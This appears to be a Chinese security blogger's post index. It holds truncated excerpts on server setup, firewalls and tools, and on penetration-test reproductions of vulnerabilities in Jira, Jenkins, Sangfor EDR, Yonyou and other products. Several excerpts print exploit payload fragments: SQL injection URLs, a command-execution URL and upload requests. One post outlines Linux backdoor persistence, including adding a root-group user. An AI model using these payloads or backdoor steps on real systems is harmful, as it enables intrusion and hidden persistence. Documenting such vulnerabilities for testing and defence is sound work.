- 博客(27)
- 收藏
- 关注
RSS订阅原创 基于iptables实现nat虚拟机与局域网安全隔离方案
本地搭建了个Centos服务器,与公网映射作为测试环境。考虑到安全性,采用KVM虚拟化技术在装个Centos虚拟机。以防测试环境不幸沦陷,危及物理主机。因为物理主机所在局域网下也会部署其他机器。故还要保证网络的安全性隔离。所有思索和调研决定采用iptables防火墙强实现。笔者主要思路和步骤记录如下,需要的读者自取。注意:因iptables的操作要求对路由规则理解程度要高,操作失误可能会导致主机连不上。请结合实际情况谨慎操作,防止踩坑,这也分享此篇文章的初衷所在。笔者也是进行多次尝试和调整。
2023-12-10 23:39:13
225
2
原创 Linux使用iptables实现内网隔断与外网控制
在内网部署了一台linux服务器,因是直接连接的路由器,不好搭建单独的内网,同时该服务器有存在重要资料,为保证网络环境的安全,故想切断该服务器与外网的连接,查阅网上资料,加上自己的实践与整理,经过不断的重启和配置及踩坑,最终得以实现,分享与需要的朋友。
2023-03-05 19:27:02
2052
1
原创 SQL注入概述和基本原理-SQL注入原因
Sql 注入是指攻击是通过将恶意的 Sql 语句插入到应用的输入参数中,让后台 Sql 服务器上解析执行进行的攻击,是目前黑客对数据库进行攻击的最常用手段之一通俗来理解就是攻击者可以在web应用程序中事先定义好的查询语句中添加额外的SQL语句。数据库执行的时候,把这段额外的SQL语句也执行了,造成攻击。
2022-09-16 22:14:17
648
原创 CURL命令常规用法和参数介绍
curl是底层使用 libcurl 库开发的命令行工具,可实现curl发送Post请求,curl上传文件,curl下载文件 ,它是一个网络数据传输项目,它支持 DICT、FILE、FTP、FTPS、Gopher、HTTP、HTTPS、IMAP、IMAPS、LDAP、LDAPS、POP3、POP3S、RTMP、RTSP、SCP、SFTP、SMB、SMBS、SMTP、SMTPS、Telnet 与 TFTP 等协议,功能也比较丰富,今天笔者就一起来为大家解锁更多用法吧。
2022-09-13 00:02:34
3427
原创 Docker安装RabbitQM及公网代理配置
本例采用使用Docker进行安装,但是安装后一直无法访问,于是采用了nginx进行代理,代理后,管理系统可进,客户端仍然无法连接,尝试更换代理方式后,顺利连接。记录分享。方便同样情况的小伙伴进行问题排查~...
2022-08-02 17:26:47
1009
原创 Prometheus实现API监控实施方法
一、 概述前言在建设接口管理平台,需要对所有接口的连通性进行检测,监测平台接口情况,进行统计和预警,因接口数量众多,且后续可能也会进行可视化展示和分析,决定使用prometheus监控体系进行监测。前后调研和实验最终决定方案如下,进行记录和分享架构示意图blackbox_exporter模块blackbox_exporter是Prometheus 官方提供的 exporter 之一,可以提供 http、dns、tcp、icmp 的监控数据采集,可用于检测接口连通性Consul 实现target
2022-04-18 21:44:33
4891
原创 CTF赛题PHP7 正则绕过
题目为ctf web中php正则绕过题前言:由于长度限制,且不像其他题目告知flag.php的内容, 笔者并没有求出flag,绕过思路可参考,也欢迎ctf大佬指点迷津。题目如下,解析flag.php中的flag变量<?phpinclude("flag.php");if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>20){ die("Too Long."); }
2021-08-19 20:53:18
2512
原创 Scrapy爬虫基本使用和技巧
Scrapy 爬虫基本使用和技巧Scrapy是什么?Scrapy是一个由Python编写的开源协作爬虫框架,可以快速的从网站中提取需要的数据。Scrapy基础爬虫部分内部已经实现,只需编写采集规则即可,简单易用,扩展性强,多平台运行兼容性好。详细笔者不做介绍,dddd(懂的都懂 哈哈)scrapy官网: https://scrapy.org/github地址:https://github.com/scrapy/scrapy一、Scrapy安装1.安装 lxml:pip3 install lxm
2021-08-12 19:31:50
448
原创 Wordpress建站教程(一)网站PHP+MySQL环境搭建与wordpress安装
前言本教程是WordPress零基础建站教程,前后共为10课,前五课是基础篇,主要分享WordPress的搭建和基本使用,适合零基础五任何开发经验又想拥有一个属于自己站点的朋友。后五篇分享WordPress的主题开发相关,帮助想独立开发专属主题的伙伴进行进阶。后续文章可能更新至博客相关文章链接WordPress建站教程十课 -(二)常用插件安装和使用WordPress建站教程十课 -(三)主题使用和菜单配置WordPress建站教程十课 -(四)文章发布和页面管理WordPress建站教程十课
2021-08-08 18:11:43
660
原创 和信创天云桌面系统远程命令执行 RCE漏洞复现渗透测试
前言和信创天云桌面系统,官方介绍,市场上主要有华为、深信服、锐捷、和信创天四大云桌面厂商,华为从网络设备的角度打造整体解决方案,深信服从安全的角度切入云桌面,锐捷主打针对教育行业的云课堂业务,但前三家厂商的云桌面产品多以传统VDI架构为主,和信创天的下一代云桌面能够融合VDI、VOI和IDV三大架构。漏洞影响:和信创天云桌面系统漏洞复现pocPOST /Upload/upload_file.php?l=1 HTTP/1.1Host: 127.0.0.1:2001User-Agent: Mozi
2021-07-15 23:13:01
935
3
原创 Atlassian Jira RCE CVE-2019-11581 漏洞复现渗透测试
简介Jira Software 专为软件团队中的每位成员构建,可用于规划、跟踪和发布卓越的软件。此漏洞由于Atlassian Jira中的Atlassian Jira Server和Jira Data Center模块存在模板注入,攻击者可以在表单插入java恶意代码,当服务端对传入数据进行解析时,会执行数据中插入的恶意代码,并执行其中的命令。可接管服务器。影响版本Atlassian Jira 4.4.x 5.x.x 6.x.x 7.x.xAtlassian Jira < 8.2.3漏洞复
2021-07-10 20:38:27
1823
原创 Linux CentOS下安装xampp集成环境
文章目录前言1.下载xammp2.xampp安装3.xampp启动4.xampp 设置密码常见问题前言xampp是一个功能强大的建站集成软件包,主要集成了Apache+PHP+MySQL环境。有着快速部署和便捷管理的优点,越来越受到众多开发人员的欢迎,本文分享Linux环境下详细安装步骤以及过程中遇到的问题和解决办法,仅供参考。笔者演示系统 Centos71.下载xammp浏览下载地址 https://sourceforge.net/projects/xampp/files/XAMPP%20Lin
2021-07-06 19:04:26
1215
原创 Jeecms弱口令和shiro反序列化RCE渗透测试记录
简介Jeecms 是一个开源企业客户关系管理快速开发基础平台,Java企业应用开源框架,Java EE(J2EE)快速开发框架,使用经典技术组合(Spring、Spring MVC、Apache Shiro、hibernate4、EasyUI、Jqgrid、Bootstrap UI),核心模块如:组织机构、角色用户、权限授权、数据权限、内容管理、工作流等功能。在企业官网、新闻站点、OA资源管理等多个领域都有应用。由于使用的Apache Shiro 是低版本的,存在shiro反序列漏洞。漏洞影响弱口
2021-07-03 11:51:51
9136
2
原创 Jeecg弱口令后台上传getShell渗透测试
前言Jeecg(J2EE Code Generation)是一款基于代码生成器JEE的智能开发平台。引领新的开发模式(Online Coding->代码生成器->手工MERGE智能开发),可以帮助解决Java项目90%的重复工作,让开发更多关注业务逻辑。既能快速提高开发效率,帮助公司节省人力成本,同时又不失灵活性。影响版本jeecg v_3.8漏洞复现1.使用弱口令登录系统 admin/1234562.进入后台后访问url 上传文件(绕过)/jeecgFormDemoContro
2021-06-30 12:51:55
3294
原创 Linux环境设置后门渗透测试
前言在渗透检测过程中或者在hvv比赛中,接管到服务器后,白天不敢搞大动作,最怕的是对方管理员直接关站了,*_* 笑哭,多次都是在线攻防。很多时候掉线了就再也连不上,留有小后门是一种不得不采取的措施,以致让我们能顺利的完成安全检测,最后切记后门要删掉,安全初心不可变!后门方式1.创建超级用户2.使用定时任务3.ssh后门4.ssh 公钥免密登录5.木马文件隐藏实现步骤1.创建超级用户第一种方式#添加用户 使其与root同组useradd root1 -g root &&
2021-06-28 22:41:23
200
原创 xxl-job弱口令登录后台RCE复现渗透测试
简介XXL-JOB是一个轻量级分布式任务调度平台,使用JAVA语言研发,使用其可以轻松的实现分布式任务调度,任务管理、执行、监控等功能,在国内颇受欢迎,目前已有多家公司接入xxl-job。任务官方地址中文版:http://www.xuxueli.com/xxl-job漏洞影响xxl-job 全版本,获取后台权限可以管理所有的任务管理,甚至可以执行指令,接管服务器。漏洞复现1.登录界面如下使用弱口令登录系统 admin/1234562.选择 任务管理 - 新增 填写以下信息 运行模式使用 GL
2021-06-27 10:33:05
3737
原创 FHAdmin任意文件上传getShell渗透测试
简介FHAdmin于2014年发布,由JAVA语言编写,是集成了代码生成、权限管理等基础功能的Java快速开发框架及平台,同时为适应技术的更新的迭代,也推出了更新框架和技术架构后的版本。漏洞复现任意文件上传/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ 存在任意文件上传。pocPOST //;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploa
2021-06-25 00:22:06
1605
原创 深信服行为感知系统和终端检测响应平台EDR REC复现渗透测试
简介深信服行为感知系统和终端检测响应平台EDR是深信服科技股份有限公司推出的安全产品,其行为感知系统 c.php 存在远程命令执行漏洞,与其相同模板的还有部分EDR,同样导致远程命令执行。漏洞影响深信服EDR 3.2.16深信服EDR 3.2.17深信服EDR 3.2.19深信服 行为感知系统漏洞复现登录界面c.php 远程命令执行漏洞 使用以下poc进行访问/tool/log/c.php?strip_slashes=system&host=echo hello/tool/l
2021-06-24 08:56:53
1786
原创 用友OA/NC/NCCloud SQL注入任意文件上传和读取RCE复现渗透测试记录
简介用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。漏洞情况用友OA_U8 存在SQL 注入用友NCCloud FS文件管理 SQL 注入用友NC bsh.servlet.BshServlet 远程命令执行用友NC 任意文件上传 getShell漏洞复现1.用友 OA_U8 SQL 注入poc/yyoa/common/js/menu/tes
2021-06-23 01:08:40
7674
2
原创 启莱OA系统SQL注入复现渗透测试
简介启莱OA的是协同OA办公系统,在多个领域均有应用。企业厂商暂不详,但被爆出前台存在4个sql注入点。漏洞复现使用url拼接一下路由POC1/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1POC2/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1POC3/client/treelist.aspx?user='
2021-06-21 13:10:06
3087
原创 Jenkins弱口令RCE复现渗透测试
简介Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成,Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。漏洞复现1.jenkins存在默认口令使用弱口令登录 admin/admin1232.找到 Manage Jenkins -Tools and Actions - Script Console 点击
2021-06-20 09:32:55
2794
原创 Nexus Repository Manager2.x Yum:Configuration RCE 复现渗透测试
简介nexus Repository Manager OSS是可以搭建一个远程的maven私服一种仓库工具,可以用来管理jar包和对应的依赖关系。但低版本存在默认口令登录,登录后台可进行任意命令执行,同时更低版本存在未授权访问影响版本Nexus Repository Manager OSS <= 2.14.13Nexus Repository Manager Pro <= 2.14.13漏洞编号:CVE-2019-5475漏洞复现默认口令登录 rce1.使用口令 admin/ad
2021-06-18 13:11:44
254
原创 Java环境容器马内置Tomcat shell
文章目录前言关键字解决了什么问题?1、服务器有java 运行环境,但无中间件部署,无法接入web shell2、服务器有中间件部署,但利用条件苛刻需要登录3、需要单独容器部署的其他情况实现方式如何使用shell 类型执行方式前言Java传统的Web shell多数以jsp方式部署在所依赖的中间件服务器运行,本文分享如何自带容器进行进行解析jsp。常见的服务器中间件有Tomcat、Weblogic、JBOSS、Coldfusion、Websphere、GlassFish等。本文不以介绍容器为重点,读者可自
2021-06-15 12:39:09
1141
1
原创 禅道渗透测试记录
一、禅道简介禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。 厂商官网:https://www.zentao.net二、获取版本使用/index.php?mode=getconfig获取版本号注意 有的版本和部署方式可能需要加 zentao eg:ip/zentao
2021-06-07 23:41:12
959
3
原创 记录一次利用jboss任意生成代码漏洞批量获取shell
记录一次利用jboss任意生成代码漏洞批量获取shell漏洞简介漏洞编号:CVE-2007-1036 此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进入到jmx控制台,并在其中执行任何功能,该漏洞利用的是后台中jboss.admin -> DeploymentFileRepository -> store()方法,通过向四个参数传入信息,可上传shell。渗透步骤搭建或者寻找存在jboss的主机可通
2021-03-31 19:46:03
684
原创 一文了解redis常用命令和使用技巧
一文了解redis常用命令和使用技巧redis批量删除key完整命令如下:参数:redis批量删除key说明:redis中没有直接根据正则表达式删除key的命令,只有del key1 key2…命令,可用redis中通过正则表达式获取key的命令:keys “正则表达式”,然后借助于xargs命令实现批量删除key,把查出来的key值当做参数传给del。eg: 批量删除索引为1的数据库匹配 “test*” 的key完整命令如下:[root@localhost redis7001]# redis-c
2021-03-04 10:18:49
131
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人